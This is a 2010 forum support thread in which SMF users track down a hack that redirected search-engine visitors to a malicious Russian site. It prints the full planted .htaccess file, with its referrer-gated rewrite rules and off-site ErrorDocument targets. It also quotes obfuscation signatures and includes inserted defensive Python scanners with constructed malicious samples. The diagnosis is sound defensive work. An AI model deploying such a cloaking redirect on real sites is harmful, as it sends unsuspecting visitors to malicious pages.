Help with hacked site 2.0 RC3

Started by TeeJay, August 06, 2010, 04:13:31 PM


TeeJay

I helped set a site up for some friends at www.lfr-wales.co.uk
I've noticed that if accessed by the above URL all seems fine, but Google search results point to (CAREFUL WITH THIS FOLLOWING LINK, IT RE-DIRECTS) www.lfr-wales.co.uk/index.php

Accessing via the second url results in a redirect to a dodgy site which contains threats

I need to find where this has been compromised and fix it as fast as possible


Any help guys ?

I really need it

Thanks

Stuck CAPS

Go into CPanel, or whatever you use to manage your site, go into wherever the redirects are, and delete the redirect to the page it shouldn't go to.
My website: iCAPS


TeeJay

Thanks but how do I know where the redirects are ?

I assumed it would be in one of the .php files or in the db ?

kat

I don't get redirected.

I'm on your site, Legal Forest Riders, as I type.

I'm on the forum, too, with no hassles.

Opera 10.60.

Both links.

xenovanis

Try index.php (in your forum root) first and compare it with the index.php from the installation package for 2.0 RC3.

Also, in the file .htaccess, do you see any oddities?
"Insanity: doing the same thing over and over again and expecting different results."

kat

As I don't get redirected, maybe your browser's been compromised.

Can you try another?

TeeJay

Thanks for the quick responses guys

Now this is getting very strange

I doubt it's my browser as the problem was reported to me by someone else (who I have no connection with)
I checked it for myself and got the same result

WARNING! before following the step below make sure you have your page and virus scanners running...

Do a UK search in Google for "Legal Forest Riders", find the link to the lfr website as above and click it

Changed the index.php file to the original one (before ezportal install), then swapped it back again to the suspect version, and the URL www.lfr-wales.co.uk/index.php no longer re-directs but the Google link does

TeeJay

Quote from: K@ on August 06, 2010, 04:50:39 PM
I don't get redirected.

I'm on your site, Legal Forest Riders, as I type.

I'm on the forum, too, with no hassles.

Opera 10.60.

Both links.

It only happens if you follow the search result in Google

TeeJay

Quote from: K@ on August 06, 2010, 04:53:45 PM
As I don't get redirected, maybe your browser's been compromised.

Can you try another?

Yes
It happens in Both Internet Explorer and Firefox

xenovanis

I've had something similar. You should report this to Google.

TeeJay

Quote from: xenovanis on August 06, 2010, 04:52:01 PM
Try index.php (in your forum root) first and compare it with the index.php from the installation package for 2.0 RC3.

Also, in the file .htaccess, do you see any oddities?

Thanks
I couldn't see anything in the file and don't have a .htaccess file

Weird how after swapping out the file for the original and then swapping back again it doesn't happen if accessed directly but still does in the Google results link?

kat


TeeJay

Quote from: xenovanis on August 06, 2010, 05:05:44 PM
I've had something similar. You should report this to Google.

It really is odd
I'm reluctant to report it to Google until I can verify that it has nothing to do with the LFR site for fear of Google dropping it out of their searches

xenovanis

It's been a while now, I can't quite recall what it exactly was and what I did. Early dementia, I suppose  ::)

Lemme search and think some more for you before you report it. I'll get back on this.

TeeJay

Many thanks folks

Yeah
Google hacked  ;D

I reckon that'd get on the international news pretty fast


Damned weird though, still can't figure it

Three separate people getting the same result on three separate PCs/Macs, none of which share any files other than all using the same forum

Does Sherlock happen to be here somewhere ?


TeeJay

Quote from: K@ on August 06, 2010, 05:25:53 PM
It's Google. No question.

The only thing to do is contact them.

Gawd knows how, though.

Maybe here?

Sorry, I thought you was joking  :-[
Can that really happen ?

kat

Not only has it happened, they also got a virus, a while back. As, indeed, did Microsoft.

Just tell them what's happening. That might not be the right place, but you've got to start somewhere.

Your link's fine, so how could it not be them?

Give them a shout. Nothing to lose, ay?

PS. If you want me to check through your files, just in case, PM me some FTP details and I'll get on it, in the morning.

Please, read this, first:

http://www.simplemachines.org/community/index.php?topic=228940.0


busterone

Further confirmation. I was not redirected using your link with FF, IE8, or with Opera. It looks to be Google.

TeeJay

Yep, I think you guys are right

I tried from my laptop and the link is OK but the Google search re-directs

Thanks for the offer K@

I'll have to speak to the site owners to get their consent so I'll get back to you on it

kat

No problem!

I have a wedding, today, as Paul and Pauline are getting hitched. http://www.simplemachines.org/community/index.php?topic=394626.0;topicseen

So, it might be tomorrow, now. :)

TeeJay

Thanks again for all the input

Is it possible that there is a "conditional redirect" which redirects if the referrer is a search engine, maybe JavaScript somewhere in the files (I don't have an .htaccess file)?

If so, where might I start to look ?

TeeJay

Update

I no longer believe it is Google at fault....

It appears as though there may well be a conditional redirect in the scripts somewhere (hopefully K@ can find it)

See here for Google info on the redirects
http://www.google.com/support/forum/p/Webmasters/thread?tid=33d2b7c117f84168&hl=en&search_impression_id=2cc34e43dcfe09d7%3A12a5605b571&search_source=related_question

Also, by using a site checking service, http://www.unmaskparasites.com , I've discovered that there does appear to be a re-direct in place to a Russian website which then redirects to alternating malicious pages

Take a look at http://www.unmaskparasites.com and type the url www.lfr-wales.co.uk into the site to be checked and see the results

So having discovered this can anyone help me find the hacked file ?

kat

Found some nasties in ezportal's javascript files.

I'm clearing those out and then I'm gonna dig deeper.

kat

Nope. I can't find anything else and I've been looking for over an hour. :(

In your ezportal directory, there's a file named "jquery-1.2.6.pack0.js".

Take a look at the last line.

I cleaned that out and you'll see the difference between that and "jquery-1.2.6.pack.js", which is the cleaned one.

Look at the difference in the filesizes, too!

Now, if that was my forum, this is what I'd do.

BACKUP FIRST!!

I'd get the full SMF install package and upload all the files, from there, to your site, overwriting what's there, now.

NOT Settings.php or install.php.

That will, without a doubt, screw all of your mods. :(

They'll still be in your Packages directory, though, so you'll just need to reinstall them. :)

Plus, of course, you might need to redo your portal blocks.

TeeJay

Many many many thanks K@

Would you help me by telling me how you tracked that down, as I'd been opening files forever and couldn't see anything (only if it's not too much time for you)


Also, would you have any clues as to how the file became corrupted ?

Thanks

kat

Pure luck, for the most part.

That link you posted said to check javascript files and .htaccess files, which is what I started-out with.

When checking the files, I looked for an unfeasibly long line, such as that one.

How did you cop it?

Well, now. That's the question, ain' it?

I really don't have a clue, to be honest.

I'll give the dev team a wave, in case there's an exploit that they could've used.

RC3 is only a Release Candidate, after all.

That's why it's not recommended for "live" sites.

TeeJay

Thanks K@

Query....

You said you had taken the code out of the infected files and renamed them yet I cannot see the new or old files in the ezportal directory ?
I can see them in the backup on my local PC

I have another SMF site at www.vdsr.co.uk which has those exact same files in the ezportal directory with the same contents (letter for letter) yet VDSR doesn't get redirected via the Google link

Are you certain that code was malicious ?

kat

That's odd...

Those files aren't there, now.

**Scratches head**

That line was exactly as described in that link you posted.

Quote: Another common method is the use of php code or javascript. This code is almost always obfuscated. With php the lines of code typically start out eval(base64_decode(" then a long string of characters. With Joomla check the file includes/defines.php. With javascript you see code like eval(unescape(" or String.fromCharCode( then long strings of characters/numbers.
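A scanner for the signs kat and the quoted post describe (unfeasibly long lines and the eval(base64_decode(, eval(unescape( and String.fromCharCode( prefixes), plus a check for text appended after an otherwise intact vendor file, as an added example that is not from the thread. The sample files are constructed and the 500-character threshold is an assumption; packed or minified libraries trip it legitimately, which is the false positive this thread ran into, so hits mark files for comparison against a pristine copy, not for deletion.

```python
from typing import Dict, List, Optional
import re

# Prefixes quoted in the thread: eval(base64_decode(" in PHP, eval(unescape("
# and String.fromCharCode( in JavaScript, each followed by a long string.
OBFUSCATION_PATTERNS = {
    "php_eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "js_eval_unescape": re.compile(r"eval\s*\(\s*unescape\s*\("),
    "js_fromcharcode": re.compile(r"String\.fromCharCode\s*\("),
}
# The "unfeasibly long line" heuristic. Assumed threshold: real packed or
# minified libraries exceed it too, so a hit means "compare", not "delete".
LONG_LINE_THRESHOLD = 500


def scan_source(text: str, long_line: int = LONG_LINE_THRESHOLD) -> List[Dict]:
    """Return one finding per (line, rule) hit, in file order."""
    findings: List[Dict] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pattern in OBFUSCATION_PATTERNS.items():
            if pattern.search(line):
                findings.append({"line": lineno, "rule": rule})
        if len(line) > long_line:
            findings.append({"line": lineno, "rule": "long_line", "length": len(line)})
    return findings


def appended_tail(suspect: str, pristine: str) -> Optional[str]:
    """If suspect is the vendor file with extra text appended (the bad last line
    kat describes), return that extra text; "" if identical; None if the file
    differs in some other way and needs a full diff."""
    if suspect.startswith(pristine):
        return suspect[len(pristine):]
    return None


# Constructed samples standing in for a vendor packed library and an infected copy.
PRISTINE_JS = (
    "/* constructed stand-in for a vendor packed library */\n"
    "eval(function(p,a,c,k,e,r){return p}('x',0,0,''.split('|'),0,{}))\n"
)
SUSPECT_JS = PRISTINE_JS + "eval(unescape('%64%6f%63%75%6d%65%6e%74" + "%20" * 200 + "'));\n"
SAMPLE_PHP = "<?php\neval(base64_decode('aGVsbG8gd29ybGQ='));\n"

if __name__ == "__main__":
    for name, text in (("pristine.js", PRISTINE_JS), ("suspect.js", SUSPECT_JS), ("x.php", SAMPLE_PHP)):
        print(name, scan_source(text))
    print("appended:", appended_tail(SUSPECT_JS, PRISTINE_JS))
```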

TeeJay

Damn
Looks like I'm going to have to pull both sites down and upload the latest files (after backing up of course)
Then re-install and configure all add-ons

At the moment I've got to guess that it isn't those files at all, as they are identical to the ones on VDSR which doesn't have the same issues
Oddly, though, those files don't appear to be in the downloaded ezportal mod

kat

Yeah, I noticed that, when I downloaded the portal, to compare the files.

I've given the devs a wave, in case this is an exploit, somehow.

Do you know what those files actually are?

If you didn't put them there, maybe that's where the problem was. I mean how they got in?

Maybe there's security hole in ezportal, rather than SMF.

TeeJay

No idea how the files got in there but here's a list of installed mods...

ezportal
smf classifieds
Uncensored Boards
Recount Member Posts
Global Headers Footers
Annoy User
SMF Trader System
SMF Links
Birthday Posts
Aeva Media

The modified date on the suspect files was 14th March 2010 but most of the installed mods were done long before that

kat

Thanks, for that!

Let's wait for the devs to see the message I left them.

Maybe they can figure this one out.

Tyrsson

k@ you should also point VBgamer to this thread since he is the mod author and may have some insight that could offer a jump on this. Just a thought.
PM at your own risk, some I answer, if they are interesting, some I ignore.

kat

Good finkin'.

'course, it might not be that mod, but it's sure worth checking.

Ta!

Tyrsson

I doubt it's the mod or anything related to SMF; most times with this type of hack it's server-side problems. A lot of times an admin will be hit with a keylogger and then the hacker will have FTP details, which gives them server access; a file can then be uploaded, the file can be run, the encoded code will then include outside files etc etc blah blah.... Not saying that is how this one worked, but it is the most common way.

vbgamer45

I don't include jquery in the latest versions of ezportal and have never used it.
If it is a packed jquery file that would be done to improve performance.
Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

kat

Ta, VB.

I dunno which version it was.

Were those files in earlier versions? (Just curious)

vbgamer45

Could have been, but they were from the jQuery site itself

butchs

You could have a simple password you used elsewhere that was hacked or not deleted your cookies after using cpanel online?

Possibly related, for the past week or so I have been programming CloudFlare capabilities for my Bad Behavior mod for SMF 2.0 RC3. Since crawlprotect stopped 20+ SQL injection attempts, I decided to work on more protection. While I was debugging the pesky BB source I blocked the following possible hack attempt:

IP: 173.193.219.168
DATE: 2010-08-02 00:25:45
URI: /smf/index.php?PHPSESSID=65c955b8b653327c9fa644280002323f&action=admin;area=topic_view
PROTOCOL: HTTP/1.0
HEADERS: GET /smf/index.php?PHPSESSID=65c955b8b653327c9fa644280002323f&action=admin;area=topic_view HTTP/1.0 Accept: text/html, */* Accept-Encoding: gzip Cf-Connecting-Ip: 173.193.219.168 Cf-Ipcountry: US Cf-Use-Byc: 0 Connection: close Host: www...
AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Media Center PC 5.0)
DENIED REASON: User agent claimed to be CloudFlare, claim appears false
EXPLANATION: You do not have permission to access this server.
ERROR: 403

Some luck, this guy picked the only operational "round trip DNS" check for CloudFlare on the internet to try to do something in my admin section (fyi - BB should release a new version soon which will include some of my code so others will have the same ability).  It looks like he tried to ride the cache for access.  Not sure if it is hack attempt or not or if it would have worked if it was not blocked?
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

TeeJay

Quote from: vbgamer45 on August 09, 2010, 01:06:03 PM
I don't include jquery in the latest versions of ezportal and have never used it.
If it is a packed jquery file that would be done to improve performance.

Hi vbgamer, nice to see you in here (thanks for the great mods)

No idea how the jquery files have gotten in there, but they aren't just in my ezportal folders; if you search the internet you'll find they're in many other SMF sites too, just search for "ezportal jquery-ui-personalized-1.6rc2.min.js" or "ezportal jquery-1.2.6.pack.js"

Interestingly these files on both VDSR and LFR-Wales had similar modified dates 13th and 18th March 2010, which probably means they got in there during an upgrade ?

Both sites share the same 1and1 server, they are both using the latest SMF 2.0 RC3, they both have ezportal and both have the impulse2 theme installed, other than that I can't see any other common factors

www.lfr-wales.co.uk suffers from the re-direct whereas www.vdsr.co.uk doesn't
The redirect also happens with some email systems but not all (following the registration confirmation link)

vbgamer45

Those js files won't do anything; they don't really execute code, they only do it on the client, and I don't believe it has anything at all to do with the hack

TeeJay

Quote from: vbgamer45 on August 09, 2010, 01:41:41 PM
Those js files won't do anything; they don't really execute code, they only do it on the client, and I don't believe it has anything at all to do with the hack

Yes I think you're right as K@ somehow removed the files and it's had no effect on anything

I'd like to find out for sure where the problem is and how it got there, but I don't think I have the time to spare, so I'll remove all files and re-upload fresh ones

Get all FTP access changed too, and get the admins of LFR to run scanners on their PCs/Macs before giving them the new details

TeeJay

FIXED

Wow, how worrying is this...

I use 1and1 servers; each domain is in its own subfolder, e.g. the top domain is the root of the server and others like lfr-wales.co.uk are pointed to a folder within the root, like lfr for example
The main domain path:
/homepages/46/d68340725/htdocs/

www.vdsr.co.uk
/homepages/46/d68340725/htdocs/vdsr

At some time in the past someone has managed to insert a .htaccess file in the root ( /homepages/46/d68340725/htdocs/ )

The contents of the htaccess file were

RewriteEngine On
ErrorDocument 400 http://ros-tec.ru/onlinestore/index.php
ErrorDocument 401 http://ros-tec.ru/onlinestore/index.php
ErrorDocument 403 http://ros-tec.ru/onlinestore/index.php
ErrorDocument 404 http://ros-tec.ru/onlinestore/index.php
ErrorDocument 500 http://ros-tec.ru/onlinestore/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://ros-tec.ru/onlinestore/index.php [R=301,L]

I have no idea how it got there; the file date was 17th Jan 2005 (I think that date is false, or at least doesn't show when the file was altered)
Oddly it seemed to have no effect on any of the other websites on the server of which there are around 21 ? ? ?

Damn, what a lot of work that was trying to find the culprit

Again, thank you guys so much for the help and effort, it's much appreciated

Terry
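An added check (not from the thread) that reads an .htaccess file and flags what TeeJay found: ErrorDocument and RewriteRule targets that leave the site, and RewriteRule lines gated on HTTP_REFERER so only visitors arriving from a search engine are redirected. The sample is constructed with the same shape as the posted file but a placeholder destination host, and www.example.org stands in for the site being checked.

```python
from typing import Dict, List, Optional
from urllib.parse import urlparse


def _external_host(target: str, site_host: str) -> Optional[str]:
    """Return the target's hostname if it points off-site, else None.
    Relative targets (/new/$1) and the site's own host (with or without
    a leading www.) are not flagged."""
    if "://" not in target:
        return None
    strip_www = lambda h: h[4:] if h.startswith("www.") else h
    host = (urlparse(target).hostname or "").lower()
    return host if strip_www(host) != strip_www(site_host.lower()) else None


def analyse_htaccess(text: str, site_host: str) -> List[Dict]:
    """Flag ErrorDocument and RewriteRule targets that leave the site and record
    whether a RewriteRule is conditioned on HTTP_REFERER (the search-engine cloak:
    a direct visit looks clean, a visit from a search result is redirected)."""
    findings: List[Dict] = []
    referer_conds: List[str] = []   # RewriteCond patterns applying to the next RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            if "HTTP_REFERER" in parts[1].upper():
                referer_conds.append(parts[2])
        elif directive == "rewriterule" and len(parts) >= 3:
            host = _external_host(parts[2], site_host)
            if host:
                findings.append({"line": lineno, "kind": "external_redirect",
                                 "target_host": host,
                                 "referer_conditioned": bool(referer_conds),
                                 "referer_patterns": list(referer_conds)})
            referer_conds = []          # conditions only apply to the rule that follows them
        elif directive == "errordocument" and len(parts) >= 3:
            host = _external_host(parts[2], site_host)
            if host:
                findings.append({"line": lineno, "kind": "external_errordocument",
                                 "target_host": host})
    return findings


# Constructed sample in the shape of the file found in the thread; the
# destination host is a placeholder, not the real one.
SAMPLE_HTACCESS = """RewriteEngine On
ErrorDocument 404 http://malicious.example/index.php
ErrorDocument 500 /errors/500.html
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://malicious.example/index.php [R=301,L]
RewriteRule ^old/(.*)$ /new/$1 [R=302,L]
"""

if __name__ == "__main__":
    for finding in analyse_htaccess(SAMPLE_HTACCESS, "www.example.org"):
        print(finding)
```

Because the rule keys on the referrer, a request without a Referer header returns the normal page, which is why the direct link tested clean while the search result redirected; a request sent with a search-engine Referer header (for example with curl's -e option) reproduces the 301 from outside.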

kat

AHA!

Yeah, that site you linked to stressed .htaccess files.

I checked all those that I could get at.

But, of course, I couldn't get at that one! :(

Thanks for posting what you found. That might well come in useful, if anyone else falls-foul of this crap.

Brilliant bit of detective-work, there, Terry!

Bloody well done!  :D

CapadY

Congratulations

I've marked this topic as solved. Feel free to re-open it when needed.
Please, don't PM me for support unless invited.
If you don't understand this, you will be blacklisted.

xenovanis

Nice job

Thanks for sharing your solution :)

Kill Em All

TeeJay, to help us make sure that this wasn't a SMF issue, would you mind taking the time to fill out a security report. Thanks :)
http://www.simplemachines.org/about/security.php


My Site: KEAGaming.com

Manual Installation of Mods
Prevent Spam and Forum Attacks
Please do not PM or email me for support unless offered, help should be publicly displayed to others.
